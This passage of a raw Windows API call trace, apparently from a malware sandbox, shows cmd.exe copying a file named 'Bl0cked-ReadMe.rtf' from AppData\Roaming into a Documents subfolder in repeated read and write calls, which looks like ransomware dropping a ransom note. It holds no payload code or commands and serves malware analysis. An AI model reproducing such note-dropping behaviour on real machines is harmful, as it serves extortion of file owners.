lpLCData="1") returned 2 [0234.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0234.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0234.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0234.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0234.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0234.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0234.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: 
lpLCData="Sat") returned 4 [0234.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0234.857] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0234.857] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0234.857] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0234.858] GetConsoleTitleW (in: lpConsoleTitle=0x3808e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.858] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.858] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0234.858] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0234.858] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0234.859] _wcsicmp (_String1="type", _String2=")") returned 75 [0234.859] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0234.859] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0234.859] _wcsicmp (_String1="IF", _String2="type") returned -11 [0234.859] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0234.859] _wcsicmp (_String1="REM", _String2="type") returned -2 [0234.859] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0234.862] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.862] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.862] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.862] GetFileType (hFile=0x7) returned 0x2 [0234.862] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0234.862] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f7e0 | out: lpMode=0x26f7e0) returned 1 [0234.862] _dup (_FileHandle=1) returned 3 [0234.863] _close (_FileHandle=1) returned 0 [0234.863] _wcsicmp 
(_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0234.863] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x26f7b0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0234.863] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0234.863] GetConsoleTitleW (in: lpConsoleTitle=0x26f5e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0234.863] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0234.863] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0234.863] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0234.863] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0234.864] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.864] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x26f144, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f144) returned 0x380e70 [0234.864] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0234.864] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0234.864] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0234.865] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26e050, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0234.865] _open_osfhandle (_OSFileHandle=0x54, 
_Flags=8) returned 4 [0234.865] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.865] GetFileType (hFile=0x54) returned 0x1 [0234.865] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.865] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x26e0a8 | out: lpFileSizeHigh=0x26e0a8*=0x0) returned 0x1632 [0234.865] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.865] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.865] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.865] ReadFile (in: hFile=0x54, lpBuffer=0x26eee0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e0d0, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesRead=0x26e0d0*=0x200, lpOverlapped=0x0) returned 1 [0234.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.865] GetFileType (hFile=0x4c) returned 0x1 [0234.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.865] GetFileType (hFile=0x4c) returned 0x1 [0234.865] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.865] WriteFile (in: hFile=0x4c, lpBuffer=0x26eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.866] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.866] GetFileType (hFile=0x4c) returned 0x1 [0234.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.867] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef30*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.867] GetFileType (hFile=0x4c) returned 0x1 [0234.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.867] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef80*, 
lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.867] GetFileType (hFile=0x4c) returned 0x1 [0234.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.867] WriteFile (in: hFile=0x4c, lpBuffer=0x26efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26efd0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.867] GetFileType (hFile=0x4c) returned 0x1 [0234.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.867] WriteFile (in: hFile=0x4c, lpBuffer=0x26f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f020*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.867] GetFileType (hFile=0x4c) returned 0x1 [0234.867] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.867] WriteFile (in: hFile=0x4c, lpBuffer=0x26f070*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f070*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.868] GetFileType (hFile=0x4c) returned 0x1 [0234.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.868] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f0c0*, lpNumberOfBytesWritten=0x26e0c4*=0x20, lpOverlapped=0x0) returned 1 [0234.868] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.868] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e0b0 | out: lpNewFilePointer=0x0) returned 1 [0234.868] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.868] ReadFile (in: hFile=0x54, lpBuffer=0x26eee0, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x26e0d0, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesRead=0x26e0d0*=0x200, lpOverlapped=0x0) returned 1 [0234.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.868] GetFileType (hFile=0x4c) returned 0x1 [0234.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.868] GetFileType (hFile=0x4c) returned 0x1 [0234.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.868] WriteFile (in: hFile=0x4c, lpBuffer=0x26eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.868] GetFileType (hFile=0x4c) returned 0x1 [0234.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.868] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef30*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.868] GetFileType (hFile=0x4c) returned 0x1 [0234.868] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.868] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef80*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.869] GetFileType (hFile=0x4c) returned 0x1 [0234.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.869] WriteFile (in: hFile=0x4c, lpBuffer=0x26efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26efd0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.869] GetFileType (hFile=0x4c) returned 0x1 [0234.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.869] WriteFile (in: 
hFile=0x4c, lpBuffer=0x26f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f020*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.869] GetFileType (hFile=0x4c) returned 0x1 [0234.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.869] WriteFile (in: hFile=0x4c, lpBuffer=0x26f070*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f070*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.869] GetFileType (hFile=0x4c) returned 0x1 [0234.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.869] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f0c0*, lpNumberOfBytesWritten=0x26e0c4*=0x20, lpOverlapped=0x0) returned 1 [0234.869] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.869] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e0b0 | out: lpNewFilePointer=0x0) returned 1 [0234.869] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.869] ReadFile (in: hFile=0x54, lpBuffer=0x26eee0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e0d0, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesRead=0x26e0d0*=0x200, lpOverlapped=0x0) returned 1 [0234.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.869] GetFileType (hFile=0x4c) returned 0x1 [0234.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.869] GetFileType (hFile=0x4c) returned 0x1 [0234.869] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.870] WriteFile (in: hFile=0x4c, lpBuffer=0x26eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.870] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0234.870] GetFileType (hFile=0x4c) returned 0x1 [0234.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.870] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef30*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.870] GetFileType (hFile=0x4c) returned 0x1 [0234.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.870] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef80*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.870] GetFileType (hFile=0x4c) returned 0x1 [0234.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.870] WriteFile (in: hFile=0x4c, lpBuffer=0x26efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26efd0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.870] GetFileType (hFile=0x4c) returned 0x1 [0234.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.870] WriteFile (in: hFile=0x4c, lpBuffer=0x26f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f020*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.870] GetFileType (hFile=0x4c) returned 0x1 [0234.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.870] WriteFile (in: hFile=0x4c, lpBuffer=0x26f070*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f070*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.870] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0234.870] GetFileType (hFile=0x4c) returned 0x1 [0234.870] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.870] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f0c0*, lpNumberOfBytesWritten=0x26e0c4*=0x20, lpOverlapped=0x0) returned 1 [0234.870] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.870] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e0b0 | out: lpNewFilePointer=0x0) returned 1 [0234.870] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.871] ReadFile (in: hFile=0x54, lpBuffer=0x26eee0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e0d0, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesRead=0x26e0d0*=0x200, lpOverlapped=0x0) returned 1 [0234.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.871] GetFileType (hFile=0x4c) returned 0x1 [0234.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.871] GetFileType (hFile=0x4c) returned 0x1 [0234.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.871] WriteFile (in: hFile=0x4c, lpBuffer=0x26eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.871] GetFileType (hFile=0x4c) returned 0x1 [0234.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.871] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef30*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.871] GetFileType (hFile=0x4c) returned 0x1 [0234.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.871] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, 
lpOverlapped=0x0 | out: lpBuffer=0x26ef80*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.871] GetFileType (hFile=0x4c) returned 0x1 [0234.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.871] WriteFile (in: hFile=0x4c, lpBuffer=0x26efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26efd0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.871] GetFileType (hFile=0x4c) returned 0x1 [0234.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.871] WriteFile (in: hFile=0x4c, lpBuffer=0x26f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f020*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.871] GetFileType (hFile=0x4c) returned 0x1 [0234.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.871] WriteFile (in: hFile=0x4c, lpBuffer=0x26f070*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f070*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.871] GetFileType (hFile=0x4c) returned 0x1 [0234.871] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.871] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f0c0*, lpNumberOfBytesWritten=0x26e0c4*=0x20, lpOverlapped=0x0) returned 1 [0234.872] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.872] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e0b0 | out: lpNewFilePointer=0x0) returned 1 [0234.872] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.872] ReadFile (in: hFile=0x54, lpBuffer=0x26eee0, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e0d0, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesRead=0x26e0d0*=0x200, lpOverlapped=0x0) returned 1 [0234.872] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.872] GetFileType (hFile=0x4c) returned 0x1 [0234.872] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.872] GetFileType (hFile=0x4c) returned 0x1 [0234.872] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.872] WriteFile (in: hFile=0x4c, lpBuffer=0x26eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.872] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.872] GetFileType (hFile=0x4c) returned 0x1 [0234.872] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.872] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef30*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.872] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.872] GetFileType (hFile=0x4c) returned 0x1 [0234.872] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.872] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef80*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.872] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.872] GetFileType (hFile=0x4c) returned 0x1 [0234.872] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.872] WriteFile (in: hFile=0x4c, lpBuffer=0x26efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26efd0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.872] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.872] GetFileType (hFile=0x4c) returned 0x1 [0234.872] _get_osfhandle (_FileHandle=1) returned 
0x4c [0234.872] WriteFile (in: hFile=0x4c, lpBuffer=0x26f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f020*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.872] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.872] GetFileType (hFile=0x4c) returned 0x1 [0234.872] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.873] WriteFile (in: hFile=0x4c, lpBuffer=0x26f070*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f070*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.873] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.873] GetFileType (hFile=0x4c) returned 0x1 [0234.873] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.873] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f0c0*, lpNumberOfBytesWritten=0x26e0c4*=0x20, lpOverlapped=0x0) returned 1 [0234.873] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.873] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e0b0 | out: lpNewFilePointer=0x0) returned 1 [0234.873] _get_osfhandle (_FileHandle=4) returned 0x54 [0234.873] ReadFile (in: hFile=0x54, lpBuffer=0x26eee0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e0d0, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesRead=0x26e0d0*=0x200, lpOverlapped=0x0) returned 1 [0234.873] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.873] GetFileType (hFile=0x4c) returned 0x1 [0234.873] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.873] GetFileType (hFile=0x4c) returned 0x1 [0234.873] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.873] WriteFile (in: hFile=0x4c, lpBuffer=0x26eee0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26eee0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) 
returned 1 [0234.873] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.873] GetFileType (hFile=0x4c) returned 0x1 [0234.873] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.873] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef30*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.873] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.873] GetFileType (hFile=0x4c) returned 0x1 [0234.873] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.873] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26ef80*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.873] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.873] GetFileType (hFile=0x4c) returned 0x1 [0234.873] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.873] WriteFile (in: hFile=0x4c, lpBuffer=0x26efd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26efd0*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.873] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.873] GetFileType (hFile=0x4c) returned 0x1 [0234.874] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.874] WriteFile (in: hFile=0x4c, lpBuffer=0x26f020*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: lpBuffer=0x26f020*, lpNumberOfBytesWritten=0x26e0c4*=0x50, lpOverlapped=0x0) returned 1 [0234.874] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.874] GetFileType (hFile=0x4c) returned 0x1 [0234.874] _get_osfhandle (_FileHandle=1) returned 0x4c [0234.874] WriteFile (in: hFile=0x4c, lpBuffer=0x26f070*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e0c4, lpOverlapped=0x0 | out: 